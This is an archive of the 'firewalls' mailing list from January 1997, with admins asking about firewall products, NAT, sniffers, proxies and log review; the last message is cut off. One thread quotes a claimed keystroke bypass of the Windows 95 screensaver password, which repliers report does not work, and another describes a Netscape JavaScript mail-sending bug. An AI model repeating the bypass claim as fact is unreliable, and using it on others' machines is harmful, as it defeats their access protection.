Date: Wed, 15 Jan 97 09:55:03 Subject: Lucent Tech Firewall Courses To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here is the calander for the upcomming Lucent Tech firewall courses (SA5010). For more information on this course and other Lucent networking and security courses visit their web site at http://www.attsa.com or call them at 800 617 0066 and 210 681 5050 Jan 27-31 Feb 10-14 Feb 24-28 Mar 10-14 Mar 24-28 Cheers Jay ------------------------------------- Jay Lyall Channel Sales Director Livermore Software Laboratories, Intl. 2825 Wilcrest, Suite 160 Houston, Texas 77042-3358 1-713-974-3274 jay@lsli.com Date: 1/15/97 Spectacle is not reality ------------------------------------- From firewalls-owner Wed Jan 15 19:43:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA23239 for firewalls-outgoing; Wed, 15 Jan 1997 08:58:21 -0800 (PST) Received: from gateway2.ey.com (gateway2.ey.com [199.50.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA23222 for ; Wed, 15 Jan 1997 08:58:01 -0800 (PST) From: KEN.BOYDSTUN@EY.COM Received: by gateway2.ey.com id AA00801 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Wed, 15 Jan 1997 11:56:59 -0500 Received: by gateway2.ey.com (Protected-side Proxy Mail Agent-2); Wed, 15 Jan 1997 11:56:59 -0500 Received: by gateway2.ey.com (Protected-side Proxy Mail Agent-1); Wed, 15 Jan 1997 11:56:59 -0500 To: " - (052)firewalls (a) greatcircle.com" Message-Id: <0014500001756429000002L092*@MHS> Date: Wed, 15 Jan 1997 11:54:19 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone out there know of any weaknesses of the Raptor firewalls. Thanks From firewalls-owner Wed Jan 15 19:47:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA22027 for firewalls-outgoing; Wed, 15 Jan 1997 08:37:32 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA21989 for ; Wed, 15 Jan 1997 08:37:11 -0800 (PST) Received: from West.Sun.COM ([129.153.100.30]) by mercury.Sun.COM (SMI-8.6/mail.byaddr) with SMTP id IAA28076 for ; Wed, 15 Jan 1997 08:34:56 -0800 Received: from plato.West.Sun.COM by West.Sun.COM (SMI-8.6/SMI-5.3) id IAA12415; Wed, 15 Jan 1997 08:34:31 -0800 Received: by plato.West.Sun.COM (SMI-8.6/SMI-SVR4) id IAA26570; Wed, 15 Jan 1997 08:37:50 -0800 Date: Wed, 15 Jan 1997 08:37:50 -0800 From: matt@plato.West.Sun.COM (Matthew Archibald) Message-Id: <199701151637.IAA26570@plato.West.Sun.COM> To: firewalls@greatcircle.com, 920145@balut.admu.edu.ph Subject: Re: Firewalls for dial-up access X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Jarn Calubiran <920145@balut.admu.edu.ph> From firewalls-owner Wed Jan 15 20:04:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA21066 for firewalls-outgoing; Wed, 15 Jan 1997 08:19:54 -0800 (PST) Received: from gatekeeper.mcimail.com (gatekeeper.mcimail.com [192.147.45.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA21030 for ; Wed, 15 Jan 1997 08:19:39 -0800 (PST) Received: from mailgate.mcimail.com (mailgate.mcimail.com [166.40.135.3]) by gatekeeper.mcimail.com (8.6.12/8.6.10) with SMTP id QAA20355; Wed, 15 Jan 1997 16:15:13 GMT Received: from mcimail.com by mailgate.mcimail.com id ag25423; 15 Jan 97 16:20 WET Date: Wed, 15 Jan 97 11:19 EST From: Peter Ngo To: firewalls , Robert Stahlbrand Subject: Re[2]: WIN'95 FLAW Message-Id: <02970115161920/0007044148PJ4EM@MCIMAIL.COM> X-MB-Info: Serial #: 191-30-2807 VERSION: 2.01H Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I tried and it did not work both on Win95 platform (Plus pack installed) and WinNT platform (4.0). Was the option password protected turned on? .... Peter Ngo From firewalls-owner Wed Jan 15 20:10:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA12066 for firewalls-outgoing; Wed, 15 Jan 1997 05:19:36 -0800 (PST) Received: from world1.sdm.de (world1.sdm.de [192.76.162.14]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA12025 for ; Wed, 15 Jan 1997 05:18:37 -0800 (PST) Received: by world1.sdm.de (SMTP gateway) id OAA03324; Wed, 15 Jan 1997 14:17:03 +0100 Received: by world1.sdm.de (SMTP security proxy) via SMTP from bsdti1.sdm.de id spool003322; Wed Jan 15 14:17:02 1997 Received: from localhost (pichel@localhost) by bsdti1.sdm.de (8.8.0/8.7.3) with SMTP id OAA28775 for ; Wed, 15 Jan 1997 14:09:03 +0100 (MET) Date: Wed, 15 Jan 1997 14:09:03 +0100 (MET) From: Joerg Pichel To: firewalls@greatcircle.com Subject: Re: Firewall-1 query In-Reply-To: <4825641F.00052211.00@mta2.lotus.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 14 Jan 1997 Martin_Khoo/SIN/Lotus%LOTUSINT@crd.lotus.com wrote: > TIS Gauntlet has a SMTP proxy (SMPAD) that you may want to take a look. smtpd (www.optuse.com) seems to be a little better (logging etc.) and can be used under GNU license! J"org! -- J"org Pichel |s |d &|m | software design & management | | | | GmbH & Co. KG | | | | Thomas-Dehler-Str. 27 joerg.pichel@sdm.de | | | | 81737 Muenchen Tel/FAX: (089) 63812-112/150 From firewalls-owner Wed Jan 15 20:12:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20512 for firewalls-outgoing; Wed, 15 Jan 1997 08:08:36 -0800 (PST) Received: from hp01.vak12ed.edu (hp01.vak12ed.edu [141.104.150.251]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA20491 for ; Wed, 15 Jan 1997 08:08:22 -0800 (PST) Message-Id: <199701151608.IAA20491@miles.greatcircle.com> Received: by hp01.vak12ed.edu (1.37.109.20/16.2) id AA257264348; Wed, 15 Jan 1997 11:05:48 -0500 From: "W.C. Epperson" Subject: RE: WIN95 FLAW To: firewalls@greatcircle.com Date: Wed, 15 Jan 1997 11:05:48 EST Cc: frank@mail.rignhaave.nl Reply-To: epperson@vak12ed.edu X-Mailer: Elm [revision: 109.18] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Pardon me if this is off topic, but what in the &*@##$@((&% does this have to do with firewalls? Frank and some other folks have been blathering (some using undeliverable return addresses): > > Hi, > > I use the 400.950 UK version of win95 > > >If the Windows'95 Screen saver is active, you can break into without any > >password and all you have to do is : press the "windows" logo key (printed > >on the M$ keyboard) and there you are. > > This works only with third party screensavers for me. The 'flying windows' > is only responding with the password dialog box. > > >If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > >tried this with my own PC and my friends. It works.....try on your own PC. > [blah, blah, blah, blah, blah] -- W.C. Epperson "I have great faith in fools. Senior SE Self-confidence, my friends call it." Information Security Officer --Edgar Allan Poe-- DBA Emeritus Curmudgeon-for-Life Virginia Dept. of Education epperson@pen.k12.va.us From firewalls-owner Wed Jan 15 20:43:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA12123 for firewalls-outgoing; Wed, 15 Jan 1997 05:20:39 -0800 (PST) Received: from charon-1.shell.nl (charon-1.shell.nl [192.87.147.99]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA12054 for ; Wed, 15 Jan 1997 05:18:59 -0800 (PST) Received: (from uucp@localhost) by charon-1.shell.nl (8.8.3/8.8.3) id OAA18938; Wed, 15 Jan 1997 14:17:53 +0100 (MET) Received: from kseu06.siep.shell.com(145.6.200.51) by charon-1.shell.nl via smap (3.2) id xma018864; Wed, 15 Jan 97 14:17:34 +0100 Received: from voyager.ksepl.shell.nl by kseu06.ksepl.shell.nl with SMTP (1.38.193.5/16.2-NCE/JvdW) id AA16920; Wed, 15 Jan 1997 14:19:20 +0100 Message-Id: <32DCD9ED.773C@siep.shell.com> Date: Wed, 15 Jan 1997 14:21:49 +0100 From: Fred Donck Organization: Shell International Exploration and Production B.V. X-Mailer: Mozilla 3.0 (X11; I; IRIX 5.3 IP22) Mime-Version: 1.0 To: PaLaN Cc: firewalls@GreatCircle.COM Subject: Re: WIN'95 FLAW References: <3.0.32.19970114145623.006882b0@202.190.59.4> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PaLaN, I've tried this on Windoze95 and on NT4.0 (incl SP2) without luck. Machines used were Compaq with normal (US) keyboards. Later, Fred PaLaN wrote: > > Howdy, > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but here > it goes : > > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC. > > Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here > ok..! Let me know if anyone of you encountered this. > > I'm goin to send M$ a mail on this bug but before that, I need to know > whether any patch available for this...thx. > > rgds, > PaLaN -- Fred Donck Tel: +31 70 311 2374 Unix System Engineer Mobile: +31 654 666 488 Internet/Intranet infrastructure Fax: +31 70 311 2166 E-mail: f.c.w.donck@siep.shell.com / fred@patriots.net From firewalls-owner Wed Jan 15 20:50:23 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA22460 for firewalls-outgoing; Wed, 15 Jan 1997 08:47:55 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA22449 for ; Wed, 15 Jan 1997 08:47:40 -0800 (PST) From: gblolmxb@ibmmail.com Message-Id: <199701151647.IAA22449@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 4586; Wed, 15 Jan 97 11:46:22 EST Date: Wed, 15 Jan 1997 11:45:45 EST To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: RE NT or UNIX Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Nik wrote: >Hi All, >I am a Master's student in Comp. Sc. and my master's project is the >design and implementation of a firewall. The basic question ahead of >me is whether to implement the firewall on NT or on Unix. >Now, I dont know the advantages / pitfalls of either approach and >since this is just a project my school doesnt care. >But, all the discussions I hear on this mailing list are mainly about >Unix firewalls and all the books talk about Unix only.Does that mean >that it is tough to get any material to build Unix software.Also is >it easier to do it on Unix since everything is so easily avaliable. >I would greatly appreciate any advice that people would have. I would not claim to be an expert on NT or UNIX, but when I was evaluating potential firewalls (which obviously includes hardware, OS & the firewall s/w) I came to a few conclusions. 1. A firewall system will be most vulnerable at its weakest point, hence the physical security of the box is just as important as how many bells & whistles the firewall software has. 2. I bow to the superior knowledge of security experts, and value their collective opinions - they can only (or rather should!) reach these opinions by examining the components that make up the firewall. This is where (in my opinion) the big difference between UNIX & NT arise. UNIX has been used, abused, taken apart and rebuilt by a wide range of people over a long period of time, in its infancy people were encouraged to do so. NT is a propriety system which, quite rightly for commercial reasons, has not been subject to such independent examination. We can only take Microsoft's word that it is a stable OS with no hidden holes, and Im afraid Microsoft do not have a good history of being completely honest and open in the past. 3. A firewall system is not a static object - users needs change. At the moment, UNIX based systems offer far more mix and match that those running under NT. 4. The networking and OS experience required to properly configure and then monitor a Firewall system is mostly found in the UNIX arena - there are far more people available with the correct skill sets with UNIX knowledge than NT. At the end of the day I had to make professional judgement, one which help me sleep most easily at night. I had the security of 60+ organisation's networks to consider, and so went for a UNIX based solution (for info, IBM's SNG software running under AIX on a RS6000 - and no, I do not have blue blood!) Mark. From firewalls-owner Wed Jan 15 20:55:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA25116 for firewalls-outgoing; Wed, 15 Jan 1997 09:22:36 -0800 (PST) Received: from sunrise (sunrise.solmelia.es [194.179.70.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA25076 for ; Wed, 15 Jan 1997 09:22:01 -0800 (PST) Received: from (firewall) by sunrise (5.x/SMI-SVR4) id AA06425; Wed, 15 Jan 1997 18:22:57 +0100 Message-Id: <9701151722.AA06425@sunrise> From: israel.serrano@solmelia.es Date: Wed, 15 Jan 97 18:13:39 To: Firewalls Subject: IP translation X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all. Just a little question. Can Cisco Routers serve also as an address translation box?. I know it can act as a paquet filer (with extended access lists) but I need it to translate addresses on one interface to other ones on the other interface. Thanx. Luis Israel Serrano Barge Departamento de Sistemas de Información / Information Technology Department Sol Meliá (http://www.solmelia.es) email: israel.serrano@solmelia.es Tlf: +34 (9)71 43 70 57 Fax: +34 (9)71 43 70 52 From firewalls-owner Wed Jan 15 21:10:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18376 for firewalls-outgoing; Wed, 15 Jan 1997 07:29:51 -0800 (PST) Received: from portal.usfg.com (portal.usfg.com [208.201.108.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA18347 for ; Wed, 15 Jan 1997 07:29:30 -0800 (PST) From: Dennis_Gnatowski@USFG.COM Received: by portal.usfg.com; id KAA27324; Wed, 15 Jan 1997 10:27:09 -0500 (EST) Received: from usfg-notes-smtp.usfg.com(170.202.29.31) by portal.usfg.com via smap (V3.1.1) id xma027319; Wed, 15 Jan 97 10:26:58 -0500 Received: by USFG-NOTES-SMTP.USFG.COM(Lotus SMTP MTA v1.01.02 (238.7 10-8-1996)) id 85256420.005503A3 ; Wed, 15 Jan 1997 10:28:34 -0400 X-Lotus-FromDomain: USFG To: firewalls@GreatCircle.COM Message-ID: <85256420:00547FF0.00@USFG-NOTES-SMTP.USFG.COM> Date: Wed, 15 Jan 1997 10:27:47 -0400 Subject: Firewall as sniffer Mime-Version: 1.0 Content-type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What security issues arrise if one were to install/run a "sniffer" type program on the firewall, or is there a better way to record/capture for analysis all traffic that hits the firewall? Is it better to put a separate sniffer or probe on the unsecure network, but then how do you monitor or access the unit through the firewall? -Dennis Gnatowski dennis_gnatowski@usfg.com From firewalls-owner Wed Jan 15 21:55:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA00186 for firewalls-outgoing; Wed, 15 Jan 1997 16:25:49 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA28198 for ; Wed, 15 Jan 1997 10:06:42 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id KAA00451; Wed, 15 Jan 1997 10:05:29 -0800 (PST) Message-Id: <3.0.32.19970115130527.006c5330@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 15 Jan 1997 13:05:29 -0500 To: Bertrum Carroll From: Paul Ferguson Subject: Re: wading in syslog files Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/enriched; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk perl? - paul At 10:55 AM 1/14/97 -0600, Bertrum Carroll wrote: >>>> Does anybody know of an app to review large syslog files for trouble spots? bc17684@90.deere.com BEGIN:VCARD FN:Bertrum Carroll N:Carroll;Bertrum EMAIL;INTERNET:bc17684@90.deere.com NOTE:Deere & Company Computer Security X-NAV-HTML:T END:VCARD -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 15 22:03:05 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA24875 for firewalls-outgoing; Wed, 15 Jan 1997 09:20:03 -0800 (PST) Received: from Relay1.Austria.EU.net (Relay1.Austria.EU.net [193.154.160.101]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA24824 for ; Wed, 15 Jan 1997 09:19:26 -0800 (PST) Received: from mmfw ([193.154.155.10]) by Relay1.Austria.EU.net with SMTP id AA22585 (5.67b/IDA-1.5 for ); Wed, 15 Jan 1997 18:18:08 +0100 Received: from OC_3 ([195.5.57.10]) by mmfw via smtpd (for Relay1.Austria.EU.net [193.154.160.101]) with SMTP; 15 Jan 1997 17:18:29 UT Received: by maxmobil.at(Lotus SMTP MTA 188.1 7-27-1996) id C1256420.006499CE ; Wed, 15 Jan 1997 19:18:49 +0200 X-Lotus-Fromdomain: MAXMOBIL_AT From: "Martin Hein" To: Firewalls@GreatCircle.com Message-Id: Date: Wed, 15 Jan 1997 19:18:39 +0200 Subject: LotusNotes and Oracle behind the firewall Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi folks, at my local site I have to setup an intranet supporting both LotusNotes and Oracle DBs which have to be accessed from the outside across a firewall as well as the outside from appropriate DB applications. One topic is a point-of-sales application, consisting of a LotusNotes-client located at our reseller/distributor sites (outside the firewall) and a LotusNotes DB behind the firewall. Is it possible to lead all this modem traffic across the firewall or do I have to ignore my safe-keeper and access the LotusNotes server directly? Martin From firewalls-owner Wed Jan 15 22:31:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA25619 for firewalls-outgoing; Wed, 15 Jan 1997 09:30:46 -0800 (PST) Received: from trex.centroin.com.br (trex.centroin.com.br [200.255.215.253]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA25527 for ; Wed, 15 Jan 1997 09:29:04 -0800 (PST) Received: from jerusalem (du79.centroin.com.br [200.255.215.79]) by trex.centroin.com.br (8.6.12/8.6.12) with ESMTP id PAA05369; Wed, 15 Jan 1997 15:21:51 -0200 Message-ID: <32DD12C4.38CE@centroin.com.br> Date: Wed, 15 Jan 1997 15:24:21 -0200 From: Alessandro Coelho Ribeiro Reply-To: sandro@centroin.com.br Organization: ACR97 X-Sender: Alessandro Coelho Ribeiro X-Mailer: Mozilla 4.0b1 (WinNT; I) MIME-Version: 1.0 To: Pilar Lavin Mera CC: firewalls-digest@GreatCircle.COM Subject: Re: TIS FWtk + netscape X-Priority: Normal References: <199701141055.LAA08506@hydra.crisa.es> Content-Type: multipart/alternative; boundary="----------45BA18D63DC11" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------45BA18D63DC11 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Pilar Lavin Mera wrote: > My company has a network acceeding to internet through a SUN Sparc Station + Solaris 2.3 and we have installed the TIS FWtoolkit. > Our problem is that we cannot configure netscape to pass through the ftp-proxy. > Can anyone help us? > You cannot configure netscape to pass through the ftp-proxy. You should configure it to use the http-proxy for ftp. The same applies for gopher proxying. The ftp proxy that comes with TIS is (that's what I think) to be used only with command-style ftp clients. Alessandro Coelho Ribeiro (sandro@centroin.com.br,sandro@acm.org) ------------45BA18D63DC11 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
Pilar Lavin Mera wrote:
 
> My company has a network acceeding to internet through a SUN Sparc Station + Solaris 2.3 and we have installed the TIS FWtoolkit.
> Our problem is that we cannot configure netscape to pass through the ftp-proxy.
> Can anyone help us?


You cannot configure netscape to pass through the ftp-proxy.  You should configure it to use the http-proxy for ftp.  The same applies for gopher proxying.  The ftp proxy that comes with TIS is (that's what I think) to be used only with command-style ftp clients.
 
Alessandro Coelho Ribeiro
(sandro@centroin.com.br,sandro@acm.org)
 
------------45BA18D63DC11-- From firewalls-owner Wed Jan 15 22:57:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA27328 for firewalls-outgoing; Wed, 15 Jan 1997 09:54:30 -0800 (PST) Received: from cs.sandia.gov (cs.sandia.gov [132.175.13.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA27280 for ; Wed, 15 Jan 1997 09:53:57 -0800 (PST) Received: from work.cs.sandia.gov.noname by cs.sandia.gov with smtp (Smail3.1.28.1 #5) id m0vkZW9-000XWFC; Wed, 15 Jan 97 10:52 MST Received: by work.cs.sandia.gov.noname (4.1/SMI-4.1) id AA07592; Wed, 15 Jan 97 10:52:54 MST Date: Wed, 15 Jan 97 10:52:54 MST From: mccurley@cs.sandia.gov (Kevin S. McCurley) Message-Id: <9701151752.AA07592@work.cs.sandia.gov.noname> To: firewalls@greatcircle.com Subject: blocking javascript Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Many sites have been waffling on the subject of blocking javascript embedded in HTTP coming through their firewall. Unfortunately, I recently discovered a javascript bug in Netscape that allows web pages to trigger a browser to send mail without knowledge of the user. This mail can be directed against a site that is collecting email addresses, or perhaps worse - against an address like root@localhost. Your SMTP filter may block dangerous email, but then it comes through web pages. Note also that such javascript can be embedded inside SMTP messages, and the Netscape mail tool will execute the javascript as long as javascript is turned on in the browser. Thus it becomes important to filter mail as well as HTTP. This is less difficult due to the offline nature of email. A demonstration of the problem is given at http://www.digicrime.com. It apparently affects Netscape 3.0-4.0b1. Ever since firewalls became commercial shrink-wrap products, I have not kept up with what everyone else is doing. Blocking Java seems much easier than blocking Javascript, because a java program comes in the form of a separate file from the HTML pages. Finding and deleting Javascript is more of a performance hit, because it requires selectively editing the HTML files coming through your firewall. The alternatives seem to be: - have a proxy look at the browser type being used inside to check it against a list of "approved browsers". Unfortunately the bug mentioned above affects the browser most likely to be on the list, and when a bug is found you need to have an alternative strategy. A browser such as Netscape 3.0 can be customized to create a corporate version, and I presume that this customization can include turning off javascript permanently. This may become the only accepted browser (yuck). - have a point of administration for internal browsers that will selectively turn off javascript. I'm not sure what progress is being made in this direction by vendors, and the hodgepodge of machines inside corporate firewalls makes this questionable. It's too bad that it comes to this. The promise of the web is being constantly broken by a flood of poorly thought out innovation. Kevin McCurley Sandia National Laboratories From firewalls-owner Wed Jan 15 23:10:43 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14474 for firewalls-outgoing; Wed, 15 Jan 1997 06:04:59 -0800 (PST) Received: from PROMETHEUS.ADVSTAFF.COM ([205.136.148.15]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA14431 for ; Wed, 15 Jan 1997 06:04:31 -0800 (PST) From: mgetter@advstaff.com Received: by PROMETHEUS.ADVSTAFF.COM; id IAA17990; Wed, 15 Jan 1997 08:55:10 -0500 (EST) Received: from st-notes01.advstaff.com(192.168.100.25) by prometheus.advstaff.com via smap (3.2) id xma017971; Wed, 15 Jan 97 08:54:56 -0500 Received: by st-notes01.advstaff.com(Lotus SMTP MTA v1.05 (274.9 11-27-1996)) id 85256420.004D1A25 ; Wed, 15 Jan 1997 09:02:09 -0400 X-Lotus-FromDomain: ADVANTAGE To: firewalls@GreatCircle.COM Message-ID: <85256420.004CE160.00@st-notes01.advstaff.com> Date: Wed, 15 Jan 1997 09:02:03 -0400 Subject: Access Reporting Mime-Version: 1.0 Content-type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for a product that will allow me to monitor and report more thoroughly on who is going where through our firewall. Any ideas would be appreciated. Thank You Marc From firewalls-owner Wed Jan 15 23:11:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15016 for firewalls-outgoing; Wed, 15 Jan 1997 06:19:18 -0800 (PST) Received: from dol.gov (BUBBA.DOL.GOV [166.96.254.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA14988 for ; Wed, 15 Jan 1997 06:18:52 -0800 (PST) Received: by dol.gov (5.x/SMI-SVR4) id AA12334; Wed, 15 Jan 1997 09:15:28 -0500 Received: from smtpgw(166.96.2.20) by gatekeeper via smap (V1.3) id sma012244; Wed Jan 15 09:15:07 1997 Received: by gatekeeper with Microsoft Mail id <32DCA0AC@gatekeeper>; Wed, 15 Jan 97 09:17:32 EST From: Alexander Don W To: firewalls Subject: Eagle Raptor Date: Wed, 15 Jan 97 08:48:00 EST Message-Id: <32DCA0AC@gatekeeper> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm reviewing several firewall products one of them being Eagle by Raptor Systems, Inc. Is there anyone out there familiar with this product? If so, I would appreciate any comments that you may have. Also, if there are any other NT based firewall products that you know are worth taking a look at, please let me know. Thanks. -Don W. Alexander dwalexan@dol.gov From firewalls-owner Wed Jan 15 23:20:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA16952 for firewalls-outgoing; Wed, 15 Jan 1997 07:02:04 -0800 (PST) Received: from bernie.compusmart.ab.ca (bernie.compusmart.ab.ca [199.185.130.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA16931 for ; Wed, 15 Jan 1997 07:01:46 -0800 (PST) Received: from INTREPID (remote257.compusmart.ab.ca [206.75.84.82]) by bernie.compusmart.ab.ca (8.7.4/8.6.5) with SMTP id IAA17604; Wed, 15 Jan 1997 08:42:38 -0700 (MST) Message-ID: <32DCF152.5835@compusmart.ab.ca> Date: Wed, 15 Jan 1997 08:01:38 -0700 From: Bob Russell Reply-To: caeits@compusmart.ab.ca Organization: CAE Aviation Ltd. X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.com Subject: NEC's PrivateNet Firewall Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm considering using the NEC PrivateNet Firewall to connect 50 users to the Internet. I like the idea of the packaged hardware/software solution. I'd appreciate any comments from the users of this service on this firewall in comparison to other solutions such as Firewall-1 or Gauntlet. Thanks Bob Russell UNIX Sys Admin CAE Aviation Ltd From firewalls-owner Wed Jan 15 23:23:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA05297 for firewalls-outgoing; Wed, 15 Jan 1997 16:58:02 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA01363 for ; Wed, 15 Jan 1997 16:47:42 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA08917; Wed, 15 Jan 1997 14:49:50 -0800 Received: from snake.srv.net(199.104.81.3) by mycroft via smap (V1.3mjr) id sma008915; Wed Jan 15 14:49:15 1997 Received: from ras10.rex.srv.net by snake.srv.net (5.65/1.1.8.2/12May95-0152AM) id AA22721; Wed, 15 Jan 1997 15:48:40 -0700 Message-Id: <32DD5F71.47F1@srv.net> Date: Wed, 15 Jan 1997 15:51:29 -0700 From: "Zippy Ship 'N Copy" X-Mailer: Mozilla 3.0 (Win95; I) Mime-Version: 1.0 To: sneakers@cs.yale.edu Cc: firewalls@GreatCircle.COM Subject: whothehell is rOOt? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't know who in the hell rOOt is, but he's really piss'n me off. Why can't people here stick the damn subject and not try to impress anyone. Anyone else want to know who rOOt is, he's some lamer that needs attention. oo0 Cosmos 0oo H.O.P.E. Helping the cause, joining the fight From firewalls-owner Wed Jan 15 23:26:11 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA05872 for firewalls-outgoing; Wed, 15 Jan 1997 17:05:10 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA01916 for ; Wed, 15 Jan 1997 16:49:09 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA08486; Wed, 15 Jan 1997 14:02:42 -0800 Received: from unknown(198.168.83.167) by mycroft via smap (V1.3mjr) id sma008479; Wed Jan 15 14:01:50 1997 Received: from SLI-Message_Server by SNC-LAVALIN.COM with Novell_GroupWise; Wed, 15 Jan 1997 17:01:53 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 15 Jan 1997 16:59:21 -0500 From: Normand Bernier To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V6 #20 -Reply Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi people !! I'm french and trying hard. Sorry for mistakes My company is willing to give the management of our entire Wan ( router+ link's ) to a external carrier company. My question is: After we installed all those firewall's internally to protect ourself from Internet and use complex internal security policy's, any idea's on the way to protect our LAN from a outside carrier company that would manage the Wan link's They need access to our routers (telnet tftp,snmp, etc). Is there any access-list, measures or document that could be use to protect ourseft. Is 